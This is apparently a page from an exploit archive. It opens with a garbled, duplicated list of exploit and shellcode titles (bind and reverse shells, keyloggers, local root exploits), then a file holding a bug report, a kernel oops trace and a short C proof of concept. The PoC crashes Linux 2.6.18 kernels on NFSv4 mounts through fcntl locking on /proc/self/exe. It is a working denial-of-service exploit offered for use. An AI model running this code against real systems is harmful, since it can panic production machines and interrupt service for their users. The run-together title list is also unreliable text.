2a57bee5c6
12 new exploits Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Exploit Linux Kernel 2.6.x (Slackware 9.1 / Debian 3.0) - chown() Group Ownership Alteration Privilege Escalation Exploit Linux Kernel < 2.6.31-rc4 - nfs4_proc_lock() Denial of Service FreeBSD/x86 - /bin/cat /etc/master.passwd NULL free shellcode (65 bytes) FreeBSD/x86 - /bin/cat /etc/master.passwd Null Free Shellcode (65 bytes) Linux/x86 - execve shellcode null byte free (Generator) Linux/x86 - execve Null Free shellcode (Generator) Linux/x86 - cmd shellcode null free (Generator) Linux/x86 - cmd Null Free shellcode (Generator) iOS - Version-independent shellcode Linux/x86-64 - bindshell port:4444 shellcode (132 bytes) Linux/x86-64 - bindshell port 4444 shellcode (132 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) NULL Free shellcode (39 bytes) Solaris/x86 - setuid(0)_ execve(//bin/sh); exit(0) Null Free shellcode (39 bytes) Windows 5.0 < 7.0 x86 - null-free bindshell shellcode Windows 5.0 < 7.0 x86 - Null Free bindshell port 28876 shellcode Win32 - telnetbind by Winexec shellcode (111 bytes) Win32 - telnetbind by Winexec 23 port shellcode (111 bytes) Windows NT/2000/XP - add user _slim_ shellcode for Russian systems (318 bytes) Windows NT/2000/XP (Russian) - Add User _slim_ Shellcode (318 bytes) Windows XP Pro SP2 English - _Message-Box_ Shellcode Null-Free (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Shellcode Null Free (12 bytes) Windows XP Pro SP2 English - _Message-Box_ Null Free Shellcode (16 bytes) Windows XP Pro SP2 English - _Wordpad_ Null Free Shellcode (12 bytes) Linux/x86 - /bin/sh Null-Free Polymorphic Shellcode (46 bytes) Linux/x86 - /bin/sh Polymorphic Null Free Shellcode (46 bytes) Win32 - Add new local administrator shellcode _secuid0_ (326 bytes) Win32 - Add New Local Administrator _secuid0_ Shellcode (326 bytes) ARM - Bindshell port 0x1337shellcode ARM - Bindshell port 0x1337 shellcode Linux Kernel <= 2.6.36 - VIDIOCSMICROCODE IOCTL Local Memory Overwrite Linux Kernel <= 2.4.0 - Stack Infoleaks bsd/x86 - connect back Shellcode (81 bytes) FreeBSD/x86 - connect back Shellcode (81 bytes) Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.10/11.04) - Privilege Boundary Crossing Local Root Exploit Acpid 1:2.0.10-1ubuntu2 (Ubuntu 11.04/11.10) - Privilege Boundary Crossing Local Root Exploit Linux Kernel 2.0 / 2.1 - SIGIO Linux Kernel 2.0 / 2.1 - Send a SIGIO Signal To Any Process Linux Kernel 2.2 - 'ldd core' Force Reboot Debian 2.1_ Linux Kernel 2.0.x_ RedHat 5.2 - Packet Length with Options Linux Kernel 2.0.x (Debian 2.1 / RedHat 5.2) - Packet Length with Options Linux Kernel 2.2.x - Non-Readable File Ptrace Linux Kernel 2.2.x - Non-Readable File Ptrace Local Information Leak OS X 10.x_ FreeBSD 4.x_OpenBSD 2.x_Solaris 2.5/2.6/7.0/8 exec C Library Standard I/O File Descriptor Closure OS X 10.x_ FreeBSD 4.x_ OpenBSD 2.x_ Solaris 2.5/2.6/7.0/8 - exec C Library Standard I/O File Descriptor Closure Linux Kernel 2.4.18/19 - Privileged File Descriptor Resource Exhaustion Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking (2) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (1) Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Local Root Exploit (2) Linux Kernel 2.4 - suid execve() System Call Race Condition PoC Linux Kernel 2.4 - suid execve() System Call Race Condition Executable File Read Proof of Concept Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Linux Kernel 2.5.x / 2.6.x - CPUFreq Proc Handler Integer Handling Memory Read Linux Kernel <= 2.6.32-5 (Debian 6.0.5) - /dev/ptmx Key Stroke Timing Local Disclosure Microsoft Internet Explorer 6.0_ Firefox 0.x_Netscape 7.x - IMG Tag Multiple Vulnerabilities Microsoft Internet Explorer 6.0 / Firefox 0.x / Netscape 7.x - IMG Tag Multiple Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Multiple Unspecified ISO9660 Filesystem Handling Vulnerabilities Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index (Proof of Concept) (1) Linux/x86 - Reverse TCP Bind Shellcode (92 bytes) Linux/x86 - Reverse TCP Bind 192.168.1.10:31337 Shellcode (92 bytes) Linux Kernel 2.2.x / 2.3.x / 2.4.x / 2.5.x / 2.6.x - ELF Core Dump Local Buffer Overflow Linux/x86-64 - Bind TCP port shellcode (81 bytes / 96 bytes with password) Linux/x86-64 - Bind TCP 4444 Port Shellcode (81 bytes / 96 bytes with password) Linux/x86 - TCP Bind Shel shellcode l (96 bytes) Linux/x86 - TCP Bind Shell 33333 Port Shellcode (96 bytes) Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'rootpipe' Privilege Escalation Mac OS X < 10.7.5/10.8.2/10.9.5/10.10.2 - 'Rootpipe' Privilege Escalation Windows x86 - user32!MessageBox _Hello World!_ Null-Free shellcode (199 bytes) Windows x86 - user32!MessageBox _Hello World!_ Null Free Shellcode (199 bytes) OS-X/x86-64 - /bin/sh Shellcode NULL Byte Free (34 bytes) OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes) Mainframe/System Z - Bind Shell shellcode (2488 bytes) Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes) OS-X/x86-64 - tcp bind shellcode_ NULL byte free (144 bytes) OS-X/x86-64 - tcp 4444 port bind Nullfree shellcode (144 bytes) Ubuntu Apport - Local Privilege Escalation Apport 2.19 (Ubuntu 15.04) - Local Privilege Escalation Linux/x86-64 - Bindshell with Password shellcode (92 bytes) Linux/x86-64 - Bindshell 31173 port with Password shellcode (92 bytes) Windows XP < 10 - Null-Free WinExec Shellcode (Python) (Generator) Windows XP < 10 - WinExec Null Free Shellcode (Python) (Generator) Linux/x86-64 - bind TCP port shellcode (103 bytes) Linux/x86-64 - TCP Bindshell with Password Prompt shellcode (162 bytes) Linux/x86-64 - Bind TCP 4444 Port Shellcode (103 bytes) Linux/x86-64 - TCP 4444 port Bindshell with Password Prompt shellcode (162 bytes) Windows x86 - Null-Free Download & Run via WebDAV Shellcode (96 bytes) Windows x86 - Download & Run via WebDAV Null Free Shellcode (96 bytes) Linux Kernel 3.10_ 3.18 + 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Linux Kernel 3.10 / 3.18 / 4.4 - netfilter IPT_SO_SET_REPLACE Memory Corruption Windows - Null-Free Shellcode Primitive Keylogger to File (431 (0x01AF) bytes) Windows - Primitive Keylogger to File Null Free Shellcode (431 (0x01AF) bytes) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (/etc/shadow) Linux Kernel (Ubuntu 14.04.3) - perf_event_open() Can Race with execve() (Access /etc/shadow) Windows - Null-Free Shellcode Functional Keylogger to File (601 (0x0259) bytes) Windows - Functional Keylogger to File Null Free Shellcode (601 (0x0259) bytes) Linux/x86-64 - Null-Free Reverse TCP Shell shellcode (134 bytes) Linux/x86-64 - Reverse TCP Shell Null Free Shellcode (134 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon (83_ 148_ 177 bytes) Linux/x86-64 - Syscall Persistent Bind Shell + Multi-terminal + Password + Daemon Shellcode (83_ 148_ 177 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal (84_ 122_ 172 bytes) Linux/x86-64 - Subtle Probing Reverse Shell_ Timer_ Burst_ Password_ Multi-Terminal Shellcode (84_ 122_ 172 bytes)
105 lines
3.3 KiB
C
Executable file
105 lines
3.3 KiB
C
Executable file
/*
|
|
Description of problem:
|
|
|
|
execution of a particular program from the Arachne suite reliably causes a
|
|
kernel panic due to a NULL-pointer dereference in nfs4_proc_lock().
|
|
|
|
Version-Release number of selected component (if applicable):
|
|
|
|
2.6.18-164.2.1.el5
|
|
|
|
How reproducible:
|
|
|
|
always on NFSv4 mounted directories
|
|
|
|
Steps to Reproduce:
|
|
1. wget http://www.genoscope.cns.fr/externe/redhat/XMLMissingField
|
|
2. Save a copy on an NFSv4-mounted directory
|
|
3. Execute it
|
|
|
|
Actual results:
|
|
|
|
Kernel panic
|
|
|
|
Expected results:
|
|
|
|
No panic
|
|
|
|
Additional info:
|
|
|
|
Console output:
|
|
|
|
Unable to handle kernel NULL pointer dereference at 0000000000000030 RIP:
|
|
[<ffffffff8837b210>] :nfs:nfs4_proc_lock+0x21f/0x3ad
|
|
PGD 1026eec067 PUD 1026f2f067 PMD 0
|
|
Oops: 0000 [1] SMP
|
|
last sysfs file: /block/dm-1/range
|
|
CPU 0
|
|
Modules linked in: ipmi_devintf ipmi_si ipmi_msghandler nfs lockd fscache
|
|
nfs_acl sunrpc bonding ipv6 xfrm_nalgo crypto_api video hwmon backlight sbs
|
|
i2c_ec button battery asus_acpi acpi_memhotplug ac joydev sg shpchp i2c_nforce2
|
|
i2c_core forcedeth dm_snapshot dm_zero dm_mod sata_nv libata mptsas mptscsih
|
|
mptbase scsi_transport_sas sd_mod scsi_mod ext3 jbd uhci_hcd ohci_hcd ehci_hcd
|
|
Pid: 4070, comm: XMLMissingField Not tainted 2.6.18-164.2.1.el5 #1
|
|
RIP: 0010:[<ffffffff8837b210>] [<ffffffff8837b210>]
|
|
:nfs:nfs4_proc_lock+0x21f/0x3ad
|
|
RSP: 0018:ffff810819bdbdd8 EFLAGS: 00010246
|
|
RAX: 0000000000000000 RBX: 0000000000000000 RCX: 0000000000000000
|
|
RDX: ffff810827c52088 RSI: 0000000000000006 RDI: ffff810819bdbe38
|
|
RBP: ffff81081a6dfdc0 R08: 0000000000000001 R09: ffff810819bdbd68
|
|
R10: ffff810819bdbd68 R11: 00000000000000d0 R12: ffff810827c52088
|
|
R13: 0000000000000000 R14: ffff810819a9b930 R15: 0000000000000006
|
|
FS: 00002b97d31fc7b0(0000) GS:ffffffff803c1000(0000) knlGS:0000000000000000
|
|
CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b
|
|
CR2: 0000000000000030 CR3: 00000010268cb000 CR4: 00000000000006e0
|
|
Process XMLMissingField (pid: 4070, threadinfo ffff810819bda000, task
|
|
ffff810827d6a7e0)
|
|
Stack: 00000000000003e8 0000000000000000 ffff810819a9b930 ffffffff88373e4f
|
|
0000000000000000 0000000000000000 0000000000000000 0000000019a9ba40
|
|
ffff810819bdbe18 ffff810819bdbe18 0000000000000000 0000000000000000
|
|
Call Trace:
|
|
[<ffffffff88373e4f>] :nfs:nfs_sync_inode_wait+0x116/0x1db
|
|
[<ffffffff8836a226>] :nfs:do_setlk+0x55/0x8c
|
|
[<ffffffff80039e72>] fcntl_setlk+0x11e/0x273
|
|
[<ffffffff800b66fa>] audit_syscall_entry+0x180/0x1b3
|
|
[<ffffffff8002e5bb>] sys_fcntl+0x269/0x2dc
|
|
[<ffffffff8005d28d>] tracesys+0xd5/0xe0
|
|
|
|
|
|
Code: 49 8b 45 30 4c 89 e6 4c 89 ef 45 8a 74 24 58 48 8b 40 18 48
|
|
RIP [<ffffffff8837b210>] :nfs:nfs4_proc_lock+0x21f/0x3ad
|
|
RSP <ffff810819bdbdd8>
|
|
CR2: 0000000000000030
|
|
<0>Kernel panic - not syncing: Fatal exception
|
|
|
|
PoC:
|
|
*/
|
|
|
|
#include <stdio.h>
|
|
#include <sys/types.h>
|
|
#include <sys/stat.h>
|
|
#include <fcntl.h>
|
|
#include <errno.h>
|
|
#include <string.h>
|
|
|
|
int main(int argc, char **argv)
|
|
{
|
|
int fd, err;
|
|
struct flock fl = { .l_type = F_RDLCK,
|
|
.l_whence = SEEK_SET };
|
|
|
|
fd = open("/proc/self/exe", O_RDONLY);
|
|
if (fd < 0) {
|
|
fprintf(stderr, "Couldn't open /proc/self/exe: %s\n",
|
|
strerror(errno));
|
|
return 1;
|
|
}
|
|
|
|
err = fcntl(fd, F_SETLK, &fl);
|
|
if (err != 0) {
|
|
fprintf(stderr, "setlk errno: %d\n", errno);
|
|
return 1;
|
|
}
|
|
|
|
return 0;
|
|
}
|